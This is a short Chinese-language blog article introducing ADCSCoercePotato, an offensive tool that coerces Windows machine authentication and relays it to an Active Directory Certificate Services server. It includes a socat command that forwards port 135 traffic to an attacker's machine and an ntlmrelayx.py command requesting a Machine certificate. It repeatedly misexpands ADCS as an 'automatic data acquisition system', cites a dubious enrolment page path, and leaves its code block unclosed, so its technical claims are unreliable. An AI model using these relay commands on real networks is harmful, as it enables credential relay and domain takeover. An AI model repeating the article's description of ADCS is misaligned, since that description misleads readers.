```markdown

2024-06-23 06:11:26作者：晏闻田Solitary

# 探索ADCSCoercePotato：解锁ADCS服务器的全新认证技巧





在日益复杂的网络安全领域中，技术社区持续探索并创新着各种工具与方法论。今天，我们将聚焦于一款名为**ADCSCoercePotato**的开源项目，它提供了一种新颖的方式用于诱使自动数据采集系统（ADCS）服务器进行机器身份验证。这不仅是一次技术上的革新，更是一种深度理解和利用现有安全机制的新途径。

## 项目介绍

由@decoder_it于2024年推出，ADCSCoercePotato旨在针对特定环境——自动数据采集系统（ADCS）服务器的环境下，强制执行机器级别的身份验证操作。这一概念背后的技术细节可在[Decoder.cloud](https://decoder.cloud/2024/02/26/hello-im-your-adcs-server-and-i-want-to-authenticate-against-you/)上找到详尽解读。

## 技术分析

该项目的核心在于对Windows远程过程调用（RPC）协议的巧妙运用和对网络重定向技术的深入理解。通过精心设计的命令行界面，用户可以指定诸如域用户名、密码、目标域名等必要参数，并且能够灵活设定重定向器的地址和端口，以及本地socket服务的监听端口。其中关键步骤包括：

- 使用`socat`工具搭建TCP桥接，实现从源地到攻击者控制机的数据传输；
- 利用`ntlmrelayx.py`脚本捕获NTLM身份验证请求，进一步将这些请求转给ADCS服务器的Web注册服务。

这种技术组合允许攻击者在无需直接访问或干预ADCS服务器的情况下，利用中间环节完成对其的认证尝试。

## 应用场景与示例

对于渗透测试人员而言，ADCSCoercePotato提供了一个研究和检验ADCS基础设施安全性的新工具箱。例如，在一个典型的局域网环境中，假设Linux主机（IP为192.168.1.88）与Windows攻击者机器（IP为192.168.1.89）相连接，且ADCS证书注册服务运行在另一台服务器（如192.168.212.41）。此时，只需简单几步配置，就能构建出一个完整的测试链路：

```shell
socat tcp-listen:135,reuseaddr,fork tcp:192.168.1.89:9999 &
ntlmrelayx.py -t http://192.168.212.41/certsrv/certrqus.asp --adcs --templates Machine -smb2support

结合ADCSCoercePotato的命令行参数设置，即可发起针对性的身份验证测试，其流程直观而高效。